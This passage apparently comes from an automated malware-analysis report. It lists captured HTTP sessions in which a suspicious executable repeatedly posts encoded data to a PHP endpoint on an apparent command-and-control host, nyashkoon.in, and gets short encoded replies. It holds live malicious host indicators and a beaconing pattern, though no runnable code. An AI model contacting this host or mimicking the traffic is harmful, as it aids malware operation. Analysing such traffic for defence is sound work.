                                        Data Ascii: [XCX\^ZU^^TUV_ZY_WY\R[RYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.'2$^0>:'!7888^>73<*$,3=8'++X=:&G!']*3
                                        Nov 5, 2024 08:12:39.685066938 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:39.768563032 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:37 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.74988837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:39.907449961 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:40.256994009 CET1032OUTData Raw: 5e 5d 43 52 59 59 5a 5c 5e 5e 54 55 56 5e 5a 5c 5f 53 59 5a 52 5b 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CRYYZ\^^TUV^Z\_SYZR[RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$8%..32$_,(?>%8[3'Z>>>$&.#%(<*:&G!']*7
                                        Nov 5, 2024 08:12:40.717376947 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:40.788028002 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.2.74989437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:40.912460089 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:41.271466970 CET1028OUTData Raw: 5b 5a 43 5b 59 59 5f 55 5e 5e 54 55 56 5a 5a 5e 5f 53 59 5b 52 51 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZC[YY_U^^TUVZZ^_SY[RQR]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G3#'=)_3$\//=%?%/8*5$:_$#\'<*:&G!']*
                                        Nov 5, 2024 08:12:41.732081890 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:41.812880039 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:39 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.2.74990037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:41.945900917 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:42.302489996 CET1032OUTData Raw: 5b 5a 43 52 5c 5f 5a 5c 5e 5e 54 55 56 52 5a 5d 5f 52 59 59 52 50 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZCR\_Z\^^TUVRZ]_RYYRPR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$T<%-.0[-($^*(X0+^*-1'*]'7_$;?Y>&G!']*


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.2.74990637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:42.633456945 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:42.990045071 CET1300OUTData Raw: 5b 59 46 5f 59 5e 5a 5d 5e 5e 54 55 56 58 5a 50 5f 55 59 58 52 5f 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YF_Y^Z]^^TUVXZP_UYXR_R_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C$'!3?,')C$_$[>)0?60+_3?X+*&G!']*/
                                        Nov 5, 2024 08:12:43.447751045 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:43.524463892 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 5f 27 16 05 0f 20 5c 2a 1d 2b 3d 33 05 22 27 3b 5a 2c 13 3b 05 24 33 06 11 29 2f 3e 52 37 5f 29 02 36 3d 27 00 23 3e 24 0d 2a 0b 2f 5a 07 10 26 01 32 32 33 1e 32 2e 30 12 30 23 0d 5b 3d 3c 12 5c 23 28 27 58 31 05 17 11 31 03 3b 57 2f 29 26 0b 2d 5e 30 05 39 57 30 5b 24 34 2c 54 0d 10 3a 0b 2a 1f 2b 0d 3e 12 25 17 25 09 1d 0d 23 3d 3f 13 3e 3a 27 0a 2b 5b 3e 5e 27 56 3b 0f 21 1c 29 53 25 28 38 11 33 0f 34 1b 25 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9_' \*+=3"';Z,;$3)/>R7_)6='#>$*/Z&2232.00#[=<\#('X11;W/)&-^09W0[$4,T:*+>%%#=?>:'+[>^'V;!)S%(834%"%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        29192.168.2.74990737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:42.980545044 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:43.333689928 CET1032OUTData Raw: 5e 5d 43 59 5c 5f 5f 55 5e 5e 54 55 56 52 5a 5c 5f 50 59 5e 52 50 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CY\__U^^TUVRZ\_PY^RPR_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$",Z%.%X%"$;;?*6<X3<?[*0<&-'(]**&G!']*
                                        Nov 5, 2024 08:12:43.791974068 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:43.873958111 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.2.74991337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:43.991014004 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:44.349417925 CET1032OUTData Raw: 5b 5f 43 59 59 5b 5f 50 5e 5e 54 55 56 5c 5a 5e 5f 57 59 51 52 58 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_CYY[_P^^TUV\Z^_WYQRXR]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A%2,[0=3<Z/;>4$'Z*=.V31'?'8#X**&G!']*?
                                        Nov 5, 2024 08:12:44.804050922 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:44.881386042 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        31192.168.2.74991937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:45.012877941 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:45.368901968 CET1032OUTData Raw: 5b 5b 46 5a 59 5c 5a 5d 5e 5e 54 55 56 58 5a 5e 5f 56 59 5a 52 5f 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [[FZY\Z]^^TUVXZ^_VYZR_RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-32$=$1</?)%('/)5'/-$=''+:&G!']*/
                                        Nov 5, 2024 08:12:45.824322939 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:45.895646095 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        32192.168.2.74992737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:46.046489954 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:46.396395922 CET1032OUTData Raw: 5e 5d 43 5a 59 5c 5f 56 5e 5e 54 55 56 53 5a 5b 5f 51 59 50 52 50 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CZY\_V^^TUVSZ[_QYPRPRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'1;'-!024/($)C'0,*$_3.'$;7>:&G!']*
                                        Nov 5, 2024 08:12:46.857409000 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:47.001858950 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        33192.168.2.74993337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:47.134038925 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:47.490169048 CET1032OUTData Raw: 5b 58 43 53 59 5e 5a 53 5e 5e 54 55 56 53 5a 50 5f 53 59 5c 52 51 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XCSY^ZS^^TUVSZP_SY\RQR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F'<Z$%_314Z/3?6(Z$Z'_).=$Y&=+0++=&G!']*
                                        Nov 5, 2024 08:12:47.945344925 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:48.018330097 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        34192.168.2.74993937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:48.149640083 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:48.505789042 CET1032OUTData Raw: 5b 5a 43 5b 5c 58 5a 55 5e 5e 54 55 56 5c 5a 50 5f 5b 59 51 52 5a 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZC[\XZU^^TUV\ZP_[YQRZR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.'1#'%3 _,<)&70/X>$Z.]$[;3;=:&G!']*?


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        35192.168.2.74994137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:48.543176889 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:48.896238089 CET1300OUTData Raw: 5e 5d 43 5d 59 55 5a 5c 5e 5e 54 55 56 53 5a 5f 5f 52 59 5b 52 5f 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]C]YUZ\^^TUVSZ__RY[R_RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$8Y3=&$!(/;=%,?_(=T'&>#'++)*&G!']*
                                        Nov 5, 2024 08:12:49.357350111 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:49.434143066 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 1c 25 28 33 0f 20 04 36 1f 2a 3e 28 5a 36 24 27 10 3b 2d 24 1f 33 0a 28 1e 29 2c 32 1b 20 17 32 5a 21 04 30 15 37 3e 01 57 3e 31 2f 5a 07 10 26 01 32 0b 34 0d 26 3e 28 58 33 55 30 06 3e 12 28 5c 22 2b 27 1f 31 3b 29 5a 25 03 37 51 2f 29 31 53 2d 3b 34 07 39 31 02 1c 32 34 2c 54 0d 10 3a 0a 29 08 20 11 3e 12 26 00 27 34 27 0c 22 3e 23 13 3d 2a 01 0e 3c 13 2a 5e 30 09 2b 0e 36 1c 0b 53 32 05 01 04 33 08 20 50 32 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9%(3 6*>(Z6$';-$3(),2 2Z!07>W>1/Z&24&>(X3U0>(\"+'1;)Z%7Q/)1S-;49124,T:) >&'4'">#=*<*^0+6S23 P2%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        36192.168.2.74994237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:48.666261911 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:49.021331072 CET1032OUTData Raw: 5e 58 43 5d 5c 5d 5a 55 5e 5e 54 55 56 59 5a 51 5f 51 59 58 52 59 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC]\]ZU^^TUVYZQ_QYXRYRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.@31/3=!]$;/;0_><%/#Y*=6T3Z6_07'7\)*&G!']*+
                                        Nov 5, 2024 08:12:49.476536989 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:49.559555054 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        37192.168.2.74994837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:49.680170059 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:50.038290024 CET1032OUTData Raw: 5b 5e 43 5a 5c 5d 5a 53 5e 5e 54 55 56 58 5a 5c 5f 51 59 50 52 5a 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [^CZ\]ZS^^TUVXZ\_QYPRZRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$2 ['.!'2/;Y>C73'(.!'1$'%+$*&G!']*/
                                        Nov 5, 2024 08:12:50.482801914 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:50.556415081 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        38192.168.2.74995737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:50.682934999 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:51.037007093 CET1032OUTData Raw: 5b 5f 43 52 5c 58 5a 5c 5e 5e 54 55 56 5d 5a 5a 5f 53 59 51 52 5d 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_CR\XZ\^^TUV]ZZ_SYQR]RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.%!<[$1]38+)%+0==-'*X&-#084=&G!']*
                                        Nov 5, 2024 08:12:51.505243063 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:51.586843967 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        39192.168.2.74996437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:51.709793091 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
